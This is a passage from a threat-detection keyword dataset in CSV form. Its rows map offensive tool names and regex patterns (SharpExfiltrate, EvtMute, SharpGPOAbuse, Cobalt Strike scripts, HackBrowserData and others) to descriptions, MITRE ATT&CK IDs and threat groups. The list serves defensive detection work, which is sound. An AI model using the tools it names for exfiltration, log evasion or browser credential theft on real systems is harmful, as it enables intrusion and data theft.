T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58967" "*SharpEvtMute.sln*",".{0,1000}SharpEvtMute\.sln.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","58968" "*SharpExcelibur*",".{0,1000}SharpExcelibur.{0,1000}","offensive_tool_keyword","cobaltstrike","Read Excel Spreadsheets (XLS/XLSX) using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpExcelibur","1","1","N/A","N/A","10","10","90","16","2024-09-30T14:28:20Z","2021-07-16T19:48:45Z","58969" "*sharp-exec *",".{0,1000}sharp\-exec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58970" "*SharpExec.exe*",".{0,1000}SharpExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58971" "*SharpExfiltrate.csproj*",".{0,1000}SharpExfiltrate\.csproj.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58972" "*SharpExfiltrate.exe*",".{0,1000}SharpExfiltrate\.exe.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58973" 
"*SharpExfiltrate.sln*",".{0,1000}SharpExfiltrate\.sln.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58974" "*SharpExfiltrateLootCache*",".{0,1000}SharpExfiltrateLootCache.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58975" "*SharpExfiltrate-main*",".{0,1000}SharpExfiltrate\-main.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","58976" "*sharp-fexec *",".{0,1000}sharp\-fexec\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","0","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58977" "*SharpFtpC2*",".{0,1000}SharpFtpC2.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.","T1572 - T1041 - T1105","TA0011 - TA0002 - 
TA0040","N/A","N/A","C2","https://github.com/DarkCoderSc/SharpFtpC2","1","1","N/A","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","58978" "*SharpGen.dll*",".{0,1000}SharpGen\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58979" "*sharpgen.enable_cache*",".{0,1000}sharpgen\.enable_cache.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58980" "*sharpgen.py*",".{0,1000}sharpgen\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58981" "*sharpgen.set_location*",".{0,1000}sharpgen\.set_location.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","58982" "*SharpGhost.exe*",".{0,1000}SharpGhost\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58983" "*SharpGhosting.exe*",".{0,1000}SharpGhosting\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 
- T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58984" "*SharpGhostTask.csproj*",".{0,1000}SharpGhostTask\.csproj.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","58985" "*SharpGhostTask.exe*",".{0,1000}SharpGhostTask\.exe.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","58986" "*SharpGhostTask.sln*",".{0,1000}SharpGhostTask\.sln.{0,1000}","offensive_tool_keyword","SharpGhostTask","registry manipulation to create scheduled tasks without triggering the usual event logs.","T1053.005 - T1112 - T1564.001","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpGhostTask","1","1","N/A","N/A","10","2","114","12","2024-01-05T15:42:55Z","2024-01-04T21:42:33Z","58987" "*SharpGmailC2-main*",".{0,1000}SharpGmailC2\-main.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","N/A","10","10","260","47","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z","58988" 
"*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","58989" "*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","N/A","10","1162","143","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z","58990" "*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58991" "*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58992" "*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpGPOAbuse","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58993" "*SharpGPOAddComputer*",".{0,1000}SharpGPOAddComputer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58994" "*SharpGPOAddLocalAdmin*",".{0,1000}SharpGPOAddLocalAdmin.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58995" "*SharpGPOAddUser*Manager*",".{0,1000}SharpGPOAddUser.{0,1000}Manager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58996" "*SharpGraph.exe Get-UserChatMessages -id *",".{0,1000}SharpGraph\.exe\sGet\-UserChatMessages\s\-id\s.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","58997" "*SharpGraph.exe List-ChatMessages *",".{0,1000}SharpGraph\.exe\sList\-ChatMessages\s.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","58998" "*SharpGraphView.exe*",".{0,1000}SharpGraphView\.exe.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","1","N/A","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","58999" "*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded 
golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","59000" "*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation 
